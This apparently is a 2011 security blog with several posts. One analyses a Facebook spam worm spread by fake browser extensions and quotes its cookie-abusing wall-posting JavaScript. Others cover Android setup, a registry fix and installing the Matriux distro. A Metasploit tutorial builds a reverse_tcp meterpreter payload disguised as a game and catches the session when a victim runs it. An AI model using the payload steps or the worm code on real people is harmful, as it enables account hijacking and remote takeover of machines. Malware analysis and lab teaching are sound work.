Tuesday, December 13, 2011

Analysis of a Facebook spam exploited through browser add-ons

This whitepaper is an analysis of Facebook spam exploited through browser add-ons and extensions. which can found as PDF for download at

Though spam on Facebook is not new to us, however I find this particular spam leveraged very smartly and it was a very interesting analysis to me because I was surprised to see what extent the spammers can go. Today one of my friends on Facebook was so annoyed with this spam which was posting on all his friends walls, which looked like this:

I was asked what to do, looking at it, it surely looked to be just like every other spam I suggested him all the usual measures like remove all his Facebook applications that are doubtful and clear his browser data. But it continued even after that so I decided to look into it.
First the URL, the spam seems to be originated from http:// nwuuwiwiwiw.blogspot.com/, looking at the blog it looked like this,

Interesting! Needs a Divx plug-in however asks to install a YouTube Premium plugin (wonder what a “premium” for YouTube would be!!).

So decided to look into the page source, here is what it contained:

So this would install the browser add-on/extension based on the browser, the else part of the code made sense to me as it has to go further if the browser is not Firefox or Chrome, let’s look into the php of the else part later. I downloaded the Firefox “YouTube” add-on and extracted it; the youtube.js was one to look into:

 Navigating to it I found

Another script at http://mieneeueueu.co.cc/yt/extra.js finally this was the Final script ;)
Now let’s analyze this script,
Remember the else part earlier in the first code snippet which I promised to discuss later? It contained a link http://mieneeueueu.co.cc/yt/video.php now the file extra.js also contains this part to redirect the user to this URL after the installation of the add-on/extension, navigating to that link I found

This page actually contained that video embedded; finally the person must be happy to see this video (however comments at the bottom are not real it’s an image, stupid and smart) ;)

As the person views the video and finishes it, this script stealing the browser cookies gets enough time to spread the spam on all the friends’ walls

Further analyzing the code,

The code here assigns some random variables for the post so that it won’t be similar on all the walls. So using all the variables post_form_id to var p3 make large combinations (use of mathematical combinations, smart eh?).

Looking into the main part of the code where the message is generated and sent for post..,

for (var f = 0; f < b; f++) {
        if (a['payload']['entries'][f]['uid'] != user_id) {
            message = [randomValue(p1), a['payload']['entries'][f]['text']['substr'](0, a['payload']['entries'][f]['text']['indexOf'](' '))['toLowerCase'](), randomValue(p2), randomValue(p3)]['join'](' ');
            var g = new XMLHttpRequest();
            d = 'http://www.facebook.com/ajax/profile/composer.php?__a=1';
            title = '[VIDEO] Yeahh!! It happens on Live Television!';
            summary = 'Lol Checkout this video its very embracing moment for her';
            imagen = 'http://i.imgur.com/f9PE7.jpg';
            e = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u574553_1&xhpc_targetid=' + a['payload']['entries'][f]['uid'] + '&xhpc_context=profile&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][medium]=103&attachment[params][urlInfo][user]=' + randomValue(video_url) + '&attachment[params][urlInfo][canonical]=' + randomValue(video_url) + '&attachment[params][favicon]=http://s.ytimg.com/yt/favicon-vflZlzSbU.ico&attachment[params][title]=' + title + '&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]=' + summary + randomValue(p0) + '&attachment[params][url]=' + randomValue(video_url) + '&attachment[params][images]&attachment[params][images][src]=' + randomValue(domains) + '%26' + Math['random']() + '&attachment[params][images][width]=398&attachment[params][images][height]=224&attachment[params][images][i]=0&attachment[params][images][safe]=1&attachment[params][ttl]=-1264972308&attachment[params][error]=1&attachment[params][responseCode]=200&attachment[params][expires]=41647446&attachment[params][images][0]=' + imagen + '&attachment[params][scrape_time]=1306619754&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text=' + message + '&xhpc_message=' + message + '&UIPrivacyWidget[0]=80&privacy_data[value]=80&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&nctr[_mod]=pagelet_wall&lsd=&post_form_id_source=AsyncRequest';
            g['open']('POST', d, true);
            g['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
            g['setRequestHeader']('Content-length', e['length']);
            g['setRequestHeader']('Connection', 'keep-alive');
            g['onreadystatechange'] = function () {};

Further looking into the above snippet of code it is clear that it uses the grabbed cookies to post the spam on others walls, this script also contained an unfinished part left out (may be the spammer was happy with this for now or grab some time from the user to finish the spam effectively) with a link to http://rihannaxgirlzke.blogspot.com/  which looked like,

 However looking into the source it didn’t contain any script or rather it was a static page with the content actually an image file.

Though social networking sites often fall prey to such scams/spams it is much of users consent due to their ignorance. Most of the times looking at the posts makes it analyze if it is genuine video from a valid link, in this case,

  1.      Looking at the post the link from where the post originated is clearly youtube.com (underlined black)
    2.   Further the thumbnail preview for videos has been changed the play button now is transparent black while the one in the spam we discussed had a blue play button (underlined red)
    3.   Always install extensions from known sources
    a.       Chrome – from chrome store
    b.      Firefox – Mozilla add-ons
    4.      Use add-ons like no-script, No-Ads to avoid such scripts.
    5.      Stay away from scams/spams that promise to provide some gift or money.  

Saturday, October 29, 2011

Setting Up Android SDK in Eclipse on Windows

This tutorial contains step by step procedure to Setup Android SDK on a windows machine.

Please read the prerequisites and installation requirements of each software before proceeding.

Download Android SDK from http://developer.android.com/sdk/index.html and install it . 

You can install any among the two types available .zip or .exe as the site says - yes it is preferable to download the .exe as which is easy .

After you install Android SDK download the latest Eclipse http://www.eclipse.org/downloads/

Any among the following two are good for android basic development

Unzip the eclipse ( i consider that you can setup the eclipse ..java path ...etc.,)

Start Eclipse and Install the Android Development Tools (ADT) by

Help >> Install new software.

and add the link https://dl-ssl.google.com/android/eclipse/  and name it ADT

Select Developer Tools and click next, if you get some error in the next step like org.eclipse.wst.sse.core 0.0.0

Do the following else skip to next step

1. Go to Help->Install New Software
2. Click on "Available Software Sites"
3. Set "check" on check box - http://download.eclipse.org/releases/indigo (for helios - Eclipse 3.7)

Then again try installing the ADT

Just accept the license terms and Finish the installation of ADT it may show up few warnings regarding the plugin verification, accept it and restart Eclipse after installation

After the restart you would see a popup like this

Select the path where android SDK was installed or you can also install a new SDK if you haven't done that before, finish the installation and you should see the highlighted items in the toolbar of eclipse

That means you have successfully setup Android SDK in Eclipse

Now Click on Android SDK manager and select the Android platforms you want to choose for your development and install them as shown below

That is it !!!

Go ahead developing your android applications!

Thursday, September 29, 2011

Fix Windows Error While Installing : Cannot open registry key

Recently I was trying to install Windows Office 2010 by performing an upgrade over the existing Office 2007 it took too long and decided to stop the installation and manually uninstall 2007 then go for 2010 fresh installation. However when I tried to uninstall 2007 there was some issue and I was not able to remove it.

I tried manually deleting Office 2007 files and also removing all its temp and reference files in the disk. This worked fine but when I tried to install 2010. I got the following error:

setup cannot open the registry key Unknown/Component/xxxxxxxxxxxx make sure you have administrative rights..

That was annoying as I realized that the registry rights were screwed , little Google search told me that I have to get SubInACL [ Download ] However that meant I had to fix all the registries
So I found a cool script on addictive tips by Ghaus Iftikar Nakodari , So here is what you do :

Copy the SubInACL.exe from the place it installed to C:\Windows\system32

Now write the following in a notepad and save it as registryfix.cmd

subinacl /subkeyreg HKEY_LOCAL_MACHINE /setowner=administrators
subinacl /subkeyreg HKEY_CURRENT_USER /setowner=administrators
subinacl /subkeyreg HKEY_CLASSES_ROOT /setowner=administrators
subinacl /subkeyreg HKEY_LOCAL_MACHINE /grant=administrators=f /grant=system=f
subinacl /subkeyreg HKEY_CURRENT_USER /grant=administrators=f /grant=system=f
subinacl /subkeyreg HKEY_CLASSES_ROOT /grant=administrators=f /grant=system=f
 Right click on the file and run it as administrator, it should take a while before it fixes all the registry keys. Do not close or interrupt the process while it runs.

Ref :  

Thursday, August 18, 2011

Installing Matriux Krypton on Hard Disk / Virtual Box

I will guide you through a series of steps that would help you installing matriux on your Hard Disk / Virtual Box

If you are installing on Hard Disk Drive scroll down to the instructions from "Step 6"

Follow these series of screenshots to install Matriux Krypton until I create a more brief tutorial and a video

Step1 :

Start the virtual box and click on "New"  and select Operating System as "Linux" and Version as "Debian"

Step 2:

Allocate the RAM memory for the Installation anything more than 256Mb is good enough

Step 3:

Create a Virtual Hard Disk for the installation usually more than 6Gb is fine ( 8GB recommended). Select anything for the type of virtual hard disk.

Step 4:

Allot the hard disk size and also the directory you want else go with the default

Step 5:

After these steps start the Virtual machine, Since it is the first time it will prompt us so that a Disk Image (ISO image) can be mounted. Browse and locate the ISO image on your hard disk. ( the place where you downloaded Matriux Krypton)

Select Installation media to the ISO in your hard disk or DVD drive

This will start Matriux in Live mode

Enter password as "toor" and login

Step 6:

Open up a terminal and type gparted to start the gparted interface

If it is a new unallocated partition then Device > Create Partition   ( else if it is a used disk space then skip the next step and go to formatting it)

Step 7:

select the Disk space you want to install Matriux and click New

Click on "Add"

Click on the Tick mark highlighted in the screen shot below and check "Apply"
and close gparted now

Step 8:

Now open a terminal and mount the partition we just created
Type the following in the terminal

mkdir /mnt/matriux
mount /dev/sda1 /mnt/matriux

Step 9:

Close the terminal, Now start the Matriux Disk Installer from the desktop and It should be easy for you now, Its a simple 7 step process !! with few entries such as username passwords, locale ...thats it!!!

Step a:

 Select the installation partition

Step b:

Choose if you want to install grub

Choose the disc for grub

Step c:

Type the username and passwords for root and user

Step d:

Select the Locale you want ( Select en_US if you are not sure and prefer English)

Step e:

Confirm your settings and profile

The installer then proceeds for a few minutes of installing Matriux

Step f:

Congratulations you have now installed Matriux, reboot your system to boot into your new installation

Happy Testing!!!!!! :D

Sunday, August 14, 2011

Matriux Krypton Launched

On the occasion of 65th Independence Day,Matriux Tiger Team is proud to present Matriux Krypton to the world.

We are young, but we are not virgins

Happy Independence Day India

Download at http://www.matriux.com/index.php?page=download

Friday, August 5, 2011

Matriux Krypton Launch

As recently we announced the release of Matriux., here is a video....

Proudly announcing the latest and the powerful security distribution Matriux Krypton 

Monday, August 1, 2011

Hacking Windows with Metasploit

TECHNOFREAKS: Hacking Windows with Metasploit: "We will have a brief tutorial, on metasploit multi/hander exploit using a meterpreter payload of reverse_tcp. Metasploit is a single m..."

Saturday, July 23, 2011

Hacking Windows with Metasploit

We will have a brief tutorial, on metasploit multi/hander exploit using a meterpreter payload of reverse_tcp.
Metasploit is a single most powerful open source tool available today for penetration testers. It can be used for developing and executing exploit code against remote target machine. A very famous and widely used penetration tester’s choice.
Metasploit Framework has 4 interfaces to work with
1.       MSF command line
2.       MSF console
3.       MSF GUI
4.       Armitage (recently included along with the framework)
There was also a web based version, which later became obsolete since it was buggy. Msfconsole is the most widely used and powerful mode of metasploit framework.
Metasploit in Matriux:
My tutorial would include Matriux as the Operating system - which can be found here - http://www.matriux.com/
Metasploit framework is found in Matriux Arsenal under Menu > Arsenal > Framework > Metasploit Framework.

Optionally it can be started from the terminal by typing msfconsole or msfgui based on what you prefer.

 This is how typically the Graphical interface looks like

However we would like to proceed with the msfconsole which I suggest is an extensive mode for using metasploit framework.
 we will have a brief article on metasploit multi/hander exploit using a meterpreter payload of reverse_tcp.
Start metasploit framework by typing “msfconsole” in the terminal and also type “msfupdate” to update the framework.

Now to start with multi/handler we have to generate the exe binded with reverse_tcp of meterpreter, that we would share with the target windows machines to exploit them. Open up a new terminal and type “msfpayload windows/meterpreter/reverse_tcp LHOST= x.x.x.x LPORT = 1080 X > /home/matriux/angrybird.exe
where, LHOST => Local HOST IP      LPORT = port to listen 

This will generate an angrybird.exe file in the HOME directory as shown here. This file is to be shared with the target machines that we intend to exploit (you can fool your target by changing the icon of the exe file generated and make it look like an angrybird game file ;))

After sharing the file with the target, we wait for the execution of that file. Meanwhile we start the reverse_tcp handler in our system. After starting msfconsole we start the metasploit process by ”use multi/handler”. And set the payload by typing “set payload windows/meterpreter/reverse_tcp

Now set the options LHOST and LPORT by typing “set LHOST localIP" and “SET LPORT porto to listen”. Set them to match with the exe payload we generated earlier, option you can check the options required by typing “show options

We are now ready to exploit our target machines, (here I set up a windows XP machine ), initiate the exploit listening process by typing “exploit” and wait for the target machine to execute the angrybird.exe  as soon as the victim clicks on the executable file it will initialize the meterpreter session with the reverse tcp.

 BINGO we are done!!! We successfully exploited a Windows XP machine with multi/handler

 And have you noticed? We just showed you a preview of Matriux’s upcoming version ;) Ch33rs!!!

This article was earlier published by me in CHmag in the July 2011 Issue - http://chmag.in/